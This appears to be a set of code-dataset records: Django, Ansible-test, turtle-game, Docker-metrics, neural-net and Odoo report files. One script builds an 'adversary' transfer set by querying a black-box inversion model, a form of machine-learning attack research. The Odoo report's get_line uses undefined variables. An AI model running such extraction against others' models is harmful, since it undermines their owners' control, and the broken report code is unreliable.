serializers.CharField(write_only=True)\n file = serializers.CharField(source='file.file_id', read_only=True)\n treatment = serializers.SerializerMethodField()\n user = UserSerializer(read_only=True)\n\n class Meta:\n model = Wound\n fields = (\n 'id', 'name', 'type', 'localization', 'is_cured', 'photo', 'width', 'height', 'first_width',\n 'first_height', 'photo_url', 'thumb_url', 'file', 'file_id', 'created', 'treatment', 'comment', 'user'\n )\n\n def create(self, validated_data, **kwargs):\n data = {\n 'photo': validated_data.pop('photo', None),\n 'width': validated_data.pop('width'),\n 'height': validated_data.pop('height')\n }\n validated_data['user'] = self._kwargs['context']['request'].user\n wound = super().create(validated_data)\n data.update({'wound': wound.pk})\n serializer = EvolutionSerializer(data=data, context=self._kwargs['context'])\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return wound\n\n def get_first_width(self, obj):\n last = obj.evolution_set.last()\n if last:\n return last.width\n\n def get_first_height(self, obj):\n last = obj.evolution_set.last()\n if last:\n return last.height\n\n def get_photo_url(self, obj):\n last = obj.evolution_set.last()\n if last and last.photo:\n return self._get_aws_base64(last.photo)\n\n def get_thumb_url(self, obj):\n last = obj.evolution_set.last()\n if last and last.thumbnail:\n return self._get_aws_base64(last.thumbnail)\n\n def get_treatment(self, obj):\n task = obj.schedule_set.first()\n if task:\n return 
task.pk\n","sub_path":"lifeline-backend-master/apps/wounds/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"397622021","text":"# Copyright (c) 2018, Oracle and/or its affiliates.\n# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n# Apache License v2.0\n# See LICENSE.TXT for details.\n\nimport pytest\nfrom nose.plugins.skip import SkipTest\nimport logging\nfrom ansible.modules.cloud.oracle import oci_load_balancer_backend_facts\nfrom ansible.module_utils.oracle import oci_utils\n\ntry:\n import oci\n from oci.load_balancer.models import Backend\n from oci.exceptions import ServiceError\nexcept ImportError:\n raise SkipTest(\n \"test_oci_load_balancer_backend_facts.py requires `oci` module\")\n\n\nclass FakeModule(object):\n def __init__(self, **kwargs):\n self.params = kwargs\n\n def fail_json(self, *args, **kwargs):\n self.exit_args = args\n self.exit_kwargs = kwargs\n raise Exception(kwargs['msg'])\n\n def exit_json(self, *args, **kwargs):\n self.exit_args = args\n self.exit_kwargs = kwargs\n\n\n@pytest.fixture()\ndef lb_client(mocker):\n mock_lb_client = mocker.patch(\n 'oci.load_balancer.load_balancer_client.LoadBalancerClient')\n return mock_lb_client.return_value\n\n\n@pytest.fixture()\ndef list_all_resources_patch(mocker):\n return mocker.patch.object(oci_utils, 'list_all_resources')\n\n\ndef setUpModule():\n logging.basicConfig(filename='/tmp/oci_ansible_module.log',\n filemode='a', level=logging.INFO)\n oci_load_balancer_backend_facts.set_logger(logging)\n\n\ndef test_list_load_balancer_backends_specific_backend(lb_client):\n module = get_module(dict({'backend_set_name': 'backend1',\n 'load_balancer_id': 'ocid1.lodbalancer.xcds', 'ip_address': '10.12.15.121', 'port': '8080'}))\n lb_client.get_backend.return_value = get_response(\n 200, None, get_backend(), None)\n result = oci_load_balancer_backend_facts.list_load_balancer_backends(lb_client, module)\n assert result['backends'][0]['ip_address'] is get_backend().ip_address\n \n\ndef test_list_load_balancer_backends_all_backends(lb_client, list_all_resources_patch):\n module = get_module(dict({'backend_set_name': 'backend1',\n 'load_balancer_id': 'ocid1.lodbalancer.xcds'}))\n list_all_resources_patch.return_value = [get_backend()]\n result = oci_load_balancer_backend_facts.list_load_balancer_backends(lb_client, module)\n assert result['backends'][0]['ip_address'] is get_backend().ip_address\n\ndef test_list_load_balancer_backends_service_error(lb_client, list_all_resources_patch):\n error_message = 'Internal Server Error'\n module = get_module(dict({'backend_set_name': 'backend1',\n 'load_balancer_id': 'ocid1.lodbalancer.xcds'}))\n list_all_resources_patch.side_effect = ServiceError(\n 500, 'InternalServerError', dict(), error_message)\n try:\n oci_load_balancer_backend_facts.list_load_balancer_backends(lb_client, module)\n except Exception as ex:\n assert error_message in ex.args[0]\n\n\n\n\ndef get_backend():\n backend = Backend()\n backend.name = \"10.159.34.21:8181\"\n backend.backup = True\n backend.drain = True\n backend.offline = True\n backend.weight = 5\n backend.ip_address = \"10.159.34.21\"\n backend.port = \"8181\"\n return backend\n\ndef get_response(status, header, data, request):\n return oci.Response(status, header, data, 
request)\n\ndef get_module(additional_properties):\n params = dict()\n params.update(additional_properties)\n module = FakeModule(**params)\n return module\n","sub_path":"ansible-scripts/test/units/test_oci_load_balancer_backend_facts.py","file_name":"test_oci_load_balancer_backend_facts.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"119305126","text":"from __future__ import print_function\r\nimport argparse\r\nimport torch\r\nimport os, shutil\r\nfrom dataset_utils import load_blackbox\r\nimport numpy as np\r\nimport pickle\r\n\r\n# Training settings\r\nparser = argparse.ArgumentParser(description='Auxiliary Information construction')\r\n# parser.add_argument('--batch-size', type=int, default=128, metavar='')\r\n# parser.add_argument('--test-batch-size', type=int, default=1000, metavar='')\r\n# parser.add_argument('--epochs', type=int, default=100, metavar='')\r\n# parser.add_argument('--lr', type=float, default=0.01, metavar='')\r\n# parser.add_argument('--momentum', type=float, default=0.5, metavar='')\r\nparser.add_argument('--no-cuda', action='store_true', default=False)\r\nparser.add_argument('--seed', type=int, default=1, metavar='')\r\n# parser.add_argument('--log-interval', type=int, default=10, metavar='')\r\nparser.add_argument('--nc', type=int, default=1)\r\nparser.add_argument('--ndf', type=int, default=128)\r\nparser.add_argument('--ngf', type=int, default=128)\r\nparser.add_argument('--nz', type=int, default=530)\r\nparser.add_argument('--truncation', type=int, default=530)\r\nparser.add_argument('--c', type=float, default=50.)\r\nparser.add_argument('--num_workers', type=int, default=1, metavar='')\r\nparser.add_argument('--auxiliary', type=int, default=100)\r\n\r\ndef get_inversion_data(model, label, quantity, nz=530):\r\n # add Gaussian noise\r\n Gaussian_noise = abs(np.random.normal(0.0, 0.1, (quantity, nz)))\r\n for i in range(quantity):\r\n Gaussian_noise[i][label] += 1.0\r\n\r\n input_vector = torch.from_numpy(Gaussian_noise)\r\n input_vector = input_vector.float()\r\n results = model(input_vector).cpu()\r\n auxiliary_data = []\r\n for i in range(quantity):\r\n data = (results[i].detach().numpy(), input_vector[i])\r\n auxiliary_data.append(data)\r\n return auxiliary_data\r\n\r\ndef main():\r\n args = parser.parse_args()\r\n print(\"================================\")\r\n print(args)\r\n print(\"================================\")\r\n os.makedirs('models/adversary/', exist_ok=True)\r\n\r\n use_cuda = not args.no_cuda and torch.cuda.is_available()\r\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\r\n kwargs = {'num_workers': args.num_workers, 'pin_memory': True} if use_cuda else {}\r\n\r\n torch.manual_seed(args.seed)\r\n inversion = load_blackbox('inversion.pth', args=args, device=device)\r\n auxiliary = []\r\n for i in range(args.nz):\r\n auxiliary.extend(get_inversion_data(inversion, i, args.auxiliary, args.nz))\r\n np.random.shuffle(auxiliary)\r\n pickle.dump(auxiliary, open('models/adversary/transferset.pickle','wb'))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"construct_auxiliary.py","file_name":"construct_auxiliary.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"373912479","text":"import turtle, random,time\nturtle.bgpic(\"seabg.png\")#background as a picture\nturtle.setup(1800,1200)#size of the 
screen\nturtle.penup()\nturtle.tracer(1,0)\nturtle.goto(0,300)\nturtle.hideturtle()\nturtle.write(\"Welcome! If you wanna play, press space\", align=\"center\", font=(\"Arial\", 40, \"normal\"))\nscore=0\ndirection = \"up\"\n\n# set up turtles\nturtle.register_shape(\"coin.gif\")#register the coin image as a turtle shape\ncoin = turtle.clone()#clone the main turtle so the coin inherits its settings\ncoin.shape(\"coin.gif\")\ncoin.speed(0)#the fastest speed\ncoin.penup()\ncoin.hideturtle()\ncoin2 = coin.clone()#make the second coin the same as the first one\ncoin2.speed(0)\ncoin2.hideturtle()\ncoin3 = coin.clone()\ncoin3.speed(0)\ncoin3.hideturtle()\n\njfish = turtle.Turtle()\nturtle.register_shape(\"jfish.gif\")#register the jellyfish image as a turtle shape\njfish.shape(\"jfish.gif\")\njfish.penup()\njfish.hideturtle()\njfish.speed(0)\njfish2 = jfish.clone()#make the second jellyfish the same as the first one\njfish3 = jfish.clone()\n\n\ntrash = turtle.Turtle()\nturtle.register_shape(\"plasticbag.gif\")\ntrash.shape(\"plasticbag.gif\")\ntrash.hideturtle()\ntrash.penup()\ntrash2=trash.clone()\ntrash3=trash.clone()\n\ndef make():#place the coins, jellyfish and trash at the start\n global coin,score,coin2,coin3,jfish,jfish2,jfish3\n y_pos = random.randint(-12,12)*40#set a random \"y\"\n coin.goto(500,y_pos)\n coin.showturtle()\n coin2.goto(500, random.randint(-12, 12)*40)\n coin2.showturtle()\n coin3.goto(500, random.randint(-12, 12)*40)\n coin3.showturtle()\n print(\"Making jellyfish!\")\n y_pos = random.randint(-12,12)*40#set a random \"y\"\n print(\"First random y position: \" + str(y_pos))\n\n jfish.goto(500, random.randint(-12, 12)*40)#jellyfish goes to the start position\n jfish.showturtle()\n jfish.speed(0)\n jfish2.goto(500, random.randint(-12, 12)*40)\n jfish2.showturtle()\n jfish3.goto(500, random.randint(-12, 12)*40)\n jfish3.showturtle()\n\n trash.goto(500, random.randint(-12, 12)*40)#trash goes to the start position\n trash.showturtle()\n trash.speed(0)\n trash2.goto(500, random.randint(-12, 12)*40)\n trash2.showturtle()\n trash2.speed(0)\n trash3.goto(500, random.randint(-12, 12)*40)\n trash3.showturtle()\n trash3.speed(0)\n \ndef move():\n global score,jfish,jfish2,jfish3,coin,coin2,coin3\n jfish.back(8)\n coin.back(8)\n coin2.back(8)\n coin3.back(8)\n jfish2.back(8)\n jfish3.back(8)\n trash.back(8)\n trash2.back(8)\n trash3.back(8)\n if coin.pos()[0]==-500 or coin2.pos()[0]==-500 or coin3.pos()[0]==-500: #check if a coin is at the same x as the sea turtle\n if abs(coin.pos()[1] - seat.pos()[1]) <= 40 or abs(coin2.pos()[1] - seat.pos()[1]) <= 40 or abs(coin3.pos()[1] - seat.pos()[1]) <= 40:#check if the sea turtle is within range of the coin\n print(\"you caught the coin\")\n score-=75\n turtle.clear()\n turtle.write(score ,move=False, align=\"center\", font=(\"Arial\", 30, \"normal\"))#change the score\n make()#the coins and jellyfish return to the start\n if score <= -100:\n turtle.clear()\n turtle.write(\"Game over! 
your score is \" +str(score) , move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\")) \n time.sleep(5)\n turtle.clear()\n score=0\n turtle.write(\"Restart\", move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\")) \n \n \n if jfish.pos()[0]==-500 or jfish2.pos()[0]==-500 or jfish3.pos()[0]==-500: #check if the jfish is in the same x as the sea turtle\n print(\"you caught the jellyfish\")\n if abs(jfish.pos()[1] - seat.pos()[1]) <= 80 or abs(jfish2.pos()[1] - seat.pos()[1]) <= 80 or abs(jfish3.pos()[1] - seat.pos()[1]) <= 80:#check if the sea t in the range of the jfish\n score+=150\n turtle.clear()\n turtle.write(score , move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\")) \n make()\n if trash.pos()[0]==-500 or trash2.pos()[0]==-500:\n if abs(trash.pos()[1] - seat.pos()[1]) <= 80 or abs(trash2.pos()[1] - seat.pos()[1]) <= 80:#check if the sea t in the range of the jfish\n turtle.clear()\n turtle.write(\"Game over! your score is \" +str(score) , move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\")) \n time.sleep(5)\n turtle.clear()\n score=0\n turtle.write(\"Restart\", move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\")) \n if jfish.pos()[0] <-850:\n make()\n \n turtle.ontimer(move, 10)\n\ndef game():\n #if the player presses the space button then the game begins\n global seat,score,direction\n turtle.clear()\n turtle.register_shape(\"seat.gif\")\n seat = turtle.clone()\n seat.showturtle()\n seat.shape(\"seat.gif\")\n seat.penup()\n seat.goto(-500,0)\n make()\n move()\n\ndef up():\n #if the player presses the up button then it'll go up\n global seat,score, direction #every change with this var will stay for the game\n direction = \"up\"\n \n pos_list = seat.pos()\n x_pos = pos_list[0]\n y_pos = pos_list[1]\n seat.goto(x_pos, y_pos+40)\n print(\"you pressed the up key!\")\n x_pos = pos_list[0]\n y_pos = pos_list[1]\n\n print(\"New y pos:\")\n print(y_pos)\n \n if y_pos>480 or y_pos<-480:\n turtle.clear()\n turtle.write(\"GAME OVER\" ,move=False, align=\"center\", font=(\"Ariel\",50,\"normal\"))\n time.sleep(1)\n turtle.clear()\n score=0\n turtle.write(\"Restart\", move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\"))\n time.sleep(1)\n turtle.clear()\n seat.goto(x_pos,y_pos-100)\n\n \ndef down():\n #if the player presses the down button then it'll go down\n global seat,down_e,up_e,score\n direction = \"down\"\n pos_list = seat.pos()\n x_pos = pos_list[0]\n y_pos = pos_list[1]\n seat.goto(x_pos, y_pos-40)\n x_pos = pos_list[0]\n y_pos = pos_list[1]\n print(\"you pressed the down key!\")\n if y_pos>480 or y_pos<-480:#what happened when your downer thn the edge\n turtle.clear()\n turtle.write(\"GAME OVER\" ,move=False, align=\"center\", font=(\"Ariel\",50,\"normal\"))\n time.sleep(1)\n turtle.clear()\n score=0\n turtle.write(\"Restart\", move=False, align=\"center\", font=(\"Ariel\", 30, \"normal\"))\n time.sleep(1)\n turtle.clear()\n seat.goto(x_pos,y_pos+100) \n \n \n \n#main program\nup_e=500\ndown_e=-500\n\nturtle.onkeypress(game, \"space\")\nturtle.onkeypress(up, \"Up\")\nturtle.onkeypress(down,\"Down\")\nturtle.listen()\nlines= turtle.clone()\nlines.hideturtle()\nlines.penup()\nlines.goto(-860,500)\nlines.speed(0)\nfor i in range(2):\n lines.pendown()\n lines.pensize(5)\n lines.forward(1700)\n lines.right(90)\n lines.forward(1000)\n lines.right(90)\n\n\n 
\n\nup_e=500\ndown_e=-500\n\nturtle.mainloop()\n\n\n\n\n\n\n\n","sub_path":"final_proj.py","file_name":"final_proj.py","file_ext":"py","file_size_in_byte":6811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"192365594","text":"# -*- coding: utf-8 -*-\nimport json\nimport requests\nimport time, datetime\nfrom urllib.request import urlopen\nimport settings, getMetrics\n\nif __name__ == '__main__':\n # get all NodeIDs in swarm\n nodes = {}\n print(\"Nodes:\")\n for node in settings.nodes_list:\n with urlopen(\"http://{node}/info\".format(node=node)) as url:\n data = json.loads(url.read().decode())\n nodes[data[\"Swarm\"][\"NodeID\"]] = node\n print('''\\t NodeID: {} '''.format(\n data[\"Swarm\"][\"NodeID\"], ))\n\n # list all the services\n services = {}\n with urlopen(\"http://{manager}/services\".format(manager=settings.manager)) as url:\n data = json.loads(url.read().decode())\n print(\"Services:\")\n for service in data:\n services[service[\"Spec\"][\"Name\"]] = {\"name\": service[\"Spec\"][\"Name\"], \"tasks\": []}\n print('''\\t name: {}, version: {}, replicas: {} '''.format(\n service[\"Spec\"][\"Name\"],\n service[\"Version\"][\"Index\"],\n service[\"Spec\"][\"Mode\"][\"Replicated\"][\"Replicas\"]))\n\n # get the tasks running on our swarm cluster\n for service_name, service in services.items():\n settings.get_tasks(service)\n\n # cpu usage api is not fast. be patient!\n # here we consistently get the cpu usage of all the web-workers and calculate the average\n\n R_ = settings.target_response_time\n\n start_time = datetime.datetime.now()\n time_limit = datetime.timedelta(seconds=4300)\n print(\"let's get started\")\n with open(\"dataop-pi_data-gathering_%s.csv\" %(start_time.strftime(\"%Y-%m-%d_%H-%M-%S\")), \"w\") as f:\n while True:\n\n now_time = datetime.datetime.now()\n if now_time - start_time >= time_limit:\n break\n\n Uw_cpu = getMetrics.calculate_cpu_utilization(nodes, services[\"web-worker\"])\n Xw = getMetrics.calculate_data_incoming_rate(nodes, services[\"web-worker\"])\n data = [now_time.strftime(\"%Y-%m-%d %H:%M:%S\"), str(Uw_cpu), str(Xw)]\n hehe = \",\".join(data)\n print(hehe)\n f.write(hehe + \"\\n\")\n\n '''Um_cpu = getMetrics.calculate_cpu_utilization(nodes, services[\"mysql\"])\n Xm = getMetrics.calculate_data_incoming_rate(nodes, services[\"mysql\"])\n data = [now_time.strftime(\"%Y-%m-%d %H:%M:%S\"), str(Um_cpu), str(Xm)]\n hehe = \",\".join(data)\n print(hehe)\n f.write(hehe + \"\\n\")'''\n\n time.sleep(5)","sub_path":"Project/system/dataGathering.py","file_name":"dataGathering.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"510228163","text":"import numpy as np\nimport pandas as pd\n\nfrom functions import softmax\nfrom model import FCLayer\nfrom nets import net1, net2, net3\n\n\ndef calc_grad(net):\n fc_layers = [x for x in net.layers if isinstance(x, FCLayer)]\n\n def load_data(w_path, b_path, name, has_index=True):\n w_path = w_path + '{}.csv'.format(name)\n\n weights = pd.read_csv(w_path, header=None, index_col=0 if has_index else None).values\n weights = np.array_split(weights, np.cumsum([x.W.shape[0] for x in fc_layers]))\n\n b_path = b_path + '{}.csv'.format(name)\n biases = pd.read_csv(b_path, header=None, index_col=0 if has_index else None).values\n biases = np.array_split(biases, len(net.layers))\n return weights, biases\n\n # load_data\n prefix = '../../input/Question_2_2/c/'\n given_weights, 
given_biases = load_data(prefix + 'w-', prefix + 'b-', net.name)\n for layer, weight in zip(fc_layers, given_weights):\n assert (layer.W.shape[0] == weight.shape[0])\n layer.W = weight[:, :layer.W.shape[1]]\n\n for layer, bias in zip(fc_layers, given_biases):\n bias = bias.flatten()\n layer.b = bias[:layer.b.shape[0]]\n\n # input\n X = [-1, 1, 1, 1, -1, -1, 1, -1, 1, 1, -1, -1, 1, 1]\n score = net.forward_propagate(X)\n prob = softmax(score)\n label = 3\n one_hot = np.array([1 if x == label else 0 for x in range(4)])\n # calculate gradients\n net.back_propagate(prob - one_hot)\n\n for layer in fc_layers:\n dw_file = '../../output/Question_2/dw-{}.csv'.format(net.name)\n db_file = '../../output/Question_2/db-{}.csv'.format(net.name)\n pd.DataFrame(layer.dW).to_csv(dw_file, mode='a', header=False, index=False)\n pd.DataFrame(layer.db.reshape(1, -1)).to_csv(db_file, mode='a', header=False, index=False)\n\n\ncalc_grad(net1)\ncalc_grad(net2)\ncalc_grad(net3)\n","sub_path":"assignment1/code/q2/calc_grad.py","file_name":"calc_grad.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"307241150","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# HLVSolution, Open Source Management Solution\n#\n##############################################################################\n\nimport time\nfrom report import report_sxw\nimport pooler\nfrom osv import osv\nfrom tools.translate import _\nimport random\nfrom datetime import datetime\nDATETIME_FORMAT = \"%Y-%m-%d %H:%M:%S\"\nDATE_FORMAT = \"%Y-%m-%d\"\n\nclass Parser(report_sxw.rml_parse):\n \n def __init__(self, cr, uid, name, context):\n super(Parser, self).__init__(cr, uid, name, context=context)\n pool = pooler.get_pool(self.cr.dbname)\n self.start_date = False\n self.end_date = False\n self.company_name = False\n self.company_address = False\n self.warehouse = False\n self.warehouse_id = False\n self.product_id = False\n self.product = False\n self.product_code = False\n \n self.vat = False\n self.get_company(cr, uid)\n self.localcontext.update({\n 'get_vietname_date':self.get_vietname_date, \n 'get_line':self.get_line,\n 'get_header':self.get_header,\n 'get_start_date':self.get_start_date,\n 'get_end_date':self.get_end_date,\n 'get_company_name':self.get_company_name,\n 'get_company_address':self.get_company_address,\n 'get_company_vat':self.get_company_vat,\n 'get_warehouse':self.get_warehouse,\n 'get_current_time':self.get_current_time,\n 'get_product':self.get_product,\n 'get_product_code':self.get_product_code,\n })\n \n def get_company(self,cr,uid):\n user_obj = self.pool.get('res.users').browse(cr,uid,uid)\n self.company_name = user_obj and user_obj.company_id and user_obj.company_id.name or ''\n self.company_address = user_obj and user_obj.company_id and user_obj.company_id.street or ''\n self.vat = user_obj and user_obj.company_id and user_obj.company_id.vat or ''\n \n def get_company_name(self):\n return self.company_name\n \n def get_current_time(self):\n date = time.strftime(DATETIME_FORMAT)\n date = datetime.strptime(date, DATETIME_FORMAT) \n return date.strftime('%d-%m-%Y %H:%M:%S')\n \n def get_company_address(self):\n return self.company_address \n \n def get_company_vat(self):\n return self.vat \n \n def get_header(self):\n wizard_data = self.localcontext['data']['form']\n self.start_date = wizard_data['date_start']\n self.end_date = wizard_data['date_end']\n 
self.warehouse = wizard_data['warehouse_id'][1] or ''\n self.warehouse_id = wizard_data['warehouse_id'][0] or ''\n self.product_id = wizard_data['product_id'][0] or ''\n self.product = wizard_data['product_id'][1] or ''\n product_obj = self.pool.get('product.product').browse(self.cr,self.uid,self.product_id)\n self.product_code = product_obj and product_obj.default_code or''\n \n def get_warehouse(self):\n return self.warehouse\n \n def get_product(self):\n return self.product\n \n def get_product_code(self):\n return self.product_code \n \n def get_start_date(self):\n self.get_header()\n return self.get_vietname_date(self.start_date) \n \n def get_end_date(self):\n return self.get_vietname_date(self.end_date) \n \n def get_vietname_date(self, date):\n if not date:\n date = time.strftime(DATE_FORMAT)\n date = datetime.strptime(date, DATE_FORMAT)\n return date.strftime('%d/%m/%Y')\n \n def get_line(self):\n wizard_data = self.localcontext['data']['form']\n res =[]\n sql = '''\n SELECT * FROM fn_cash_book_report(%s,'%s','%s')\n ''' %(self.account_id,self.start_date,self.end_date)\n self.cr.execute(sql)\n for line in self.cr.dictfetchall():\n bal_amount = line['bal_amount'] and line['bal_amount'] or ''\n description = line['description'] and line['description'] or ''\n if lang=='e' and line['bold_flag'] == True:\n description = line['translate_des'] and line['translate_des'] or '',\n \n if line['bold_flag'] == True:\n bal_amount = line['bal_amount'] and line['bal_amount'] or 0\n \n pay_num = line['pay_num'] or line['rec_num'] or ''\n \n res.append({\n 'gl_date':line['gl_date'] and self.get_vietname_date(line['gl_date']) or '',\n 'document_date':line['document_date'] and self.get_vietname_date(line['document_date']) or '',\n 'rec_num':pay_num,\n 'description':description,\n 'pay_amount':line['pay_amount'] and line['pay_amount'] or '',\n 'rec_amount':line['rec_amount'] and line['rec_amount'] or '',\n 'bal_amount':bal_amount,\n 'bold_flag':line['bold_flag'] and line['bold_flag'] or False\n })\n return res\n \n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"addons-deploy/general_report_warehouse/report/general_stock_ledger.py","file_name":"general_stock_ledger.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"340139178","text":"import random\n\n# Get the user's guess\n# Params: None\n# Returns: Integer\n#\ndef get_guess():\n\n # Get initial guess\n guess = raw_input('Enter your guess: ')\n\n # Assume it's not valid, until it's proven otherwise\n valid = False\n\n while valid != True:\n\n try:\n # Try and convert this number to an integer\n # If it fails, the exception will occur\n guess = int(guess)\n except Exception:\n # Exception was thrown when trying to convert to number,\n # Report the issue and ask again\n print('Invalid input; please enter a whole number.')\n valid = False\n guess = get_guess()\n\n # If they get here, it means the number must have been valid\n # Set valid to be true to break out of the while loop\n valid = True\n\n return guess\n\n\ndef compare(numA, numB):\n if numA > numB:\n return 'high'\n elif numB > numA:\n return 'low'\n\n# main function\n# Param: low and high limits\n# Returns: String result\ndef play(lowNum, highNum):\n secret_number = random.randint(lowNum, highNum)\n \n print('number is ' + str(secret_number))\n \n print('\\nI\\'m thinking of a number between ' + str(lowNum) + ' and ' + str(highNum) + ', what do you think it 
is?')\n \n guess = int(get_guess())\n count = 1\n while guess != secret_number:\n print('Too ' + compare(guess, secret_number) + '. Guess again.')\n guess = int(get_guess())\n count = count + 1\n print('You got it! Secret number was ' + str(secret_number))\n print('It took you ' + str(count) + ' guesses.')\n \nplay(1,10)","sub_path":"mosthighleveldir/guessagain.py","file_name":"guessagain.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"290309185","text":"import turtle\nturtle.goto(0,0)\nturtle.tracer(1,0)\n\nturtle.direction= None \n\ndef up():\n turtle.direction = \"Up\"\n print('you pressed the up key.')\n on_move()\n\ndef down():\n turtle.direction='Down'\n print('you pressed the down button')\n on_move()\n\ndef left():\n turtle.direction='Left'\n print('you pressed the left button')\n on_move()\ndef right():\n turtle.direction='Right'\n print('you pressed the right button')\n on_move()\n \npixel_move=20\n\ndef on_move():\n turtle.position()\n x_pos=turtle.xcor()\n y_pos=turtle.ycor()\n if turtle.direction=='Up':\n turtle.goto(x_pos,y_pos+pixel_move)\n turtle.seth(90)\n elif turtle.direction=='Left':\n turtle.goto(x_pos-pixel_move,y_pos)\n turtle.seth(180)\n elif turtle.direction=='Right':\n turtle.goto(x_pos+pixel_move,y_pos)\n turtle.seth(0)\n else:\n turtle.goto(x_pos,y_pos-pixel_move)\n turtle.seth(270)\n \n \n\nturtle.onkey(up, \"Up\")\nturtle.onkey(down,'Down')\nturtle.onkey(left,'Left')\nturtle.onkey(right,'Right')\n##turtle.goto(0,0)\nturtle.listen()\n\n\n\nturtle.mainloop()\n","sub_path":"fun2.py","file_name":"fun2.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"400552145","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport model_utils.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Deployment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('url', models.CharField(max_length=600)),\n ('email', models.EmailField(max_length=75)),\n ('deploy_id', models.CharField(max_length=100)),\n ('remote_container_id', models.CharField(max_length=64)),\n ('remote_app_id', models.CharField(max_length=100, blank=True)),\n ('launch_time', models.DateTimeField(null=True, blank=True)),\n ('expiration_time', models.DateTimeField(null=True, blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('status', models.CharField(default=b'Deploying', max_length=50, choices=[(b'Deploying', b'Deploying'), (b'Completed', b'Completed'), (b'Failed', b'Failed'), (b'Expired', b'Expired')])),\n ('reminder_mail_sent', models.BooleanField(default=False)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DeploymentErrorLog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('http_status', models.CharField(max_length=3)),\n ('error_log', models.TextField()),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('deployment', models.OneToOneField(related_name='error_log', to='deployment.Deployment')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n 
name='Project',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ('github_url', models.CharField(max_length=200)),\n ('image_name', models.CharField(max_length=300)),\n ('ports', models.CharField(help_text=b'Internally exposed ports separated by spaces, example: 80 8080', max_length=300)),\n ('hostnames', models.CharField(help_text=b'Hostnames separated by spaces, needed when multiple ports are exposed, example: lms cms', max_length=300, blank=True)),\n ('env_vars', models.CharField(help_text=b'Space separated environment variables, example: key1=val1 key2=val2', max_length=500, blank=True)),\n ('number_of_cpus', models.DecimalField(null=True, max_digits=4, decimal_places=2, blank=True)),\n ('amount_of_ram', models.PositiveIntegerField(null=True, verbose_name=b'Amount of RAM in MB', blank=True)),\n ('trial_duration', models.IntegerField(help_text=b'Trial duration in minutes', null=True, blank=True)),\n ('unconfirmed_trial_duration', models.IntegerField(help_text=b'Trial duration in minutes', null=True, blank=True)),\n ('slug', models.SlugField(max_length=40, null=True, blank=True)),\n ('status', model_utils.fields.StatusField(default=b'Inactive', max_length=100, no_check_for_status=True, choices=[(b'Active', b'Active'), (b'Hidden', b'Hidden'), (b'Inactive', b'Inactive')])),\n ('default_username', models.CharField(max_length=30, blank=True)),\n ('default_password', models.CharField(max_length=30, blank=True)),\n ('survey_form_url', models.URLField(blank=True)),\n ],\n options={\n 'ordering': ['name'],\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='deployment',\n name='project',\n field=models.ForeignKey(related_name='deployments', to='deployment.Project'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='deployment',\n name='user',\n field=models.ForeignKey(related_name='deployments', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"launcher/deployment/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"377476959","text":"import os\n#os.environ['TF_CPP_MIN_LOG_LEVEL']='2' #silence SSE warnings\nimport tensorflow as tf\nprint(tf.__version__)\nimport itertools\nimport numpy as np\nfrom numpy import genfromtxt\n#tf.logging.set_verbosity(tf.logging.ERROR) #supressing more warnings\n\nfeatures = [tf.contrib.layers.real_valued_column(\"x\", dimension=5)]\n\nestimator = tf.contrib.learn.LinearRegressor(feature_columns=features)\n\ncsvData = genfromtxt('cpuData.data', delimiter=',')\nprices = 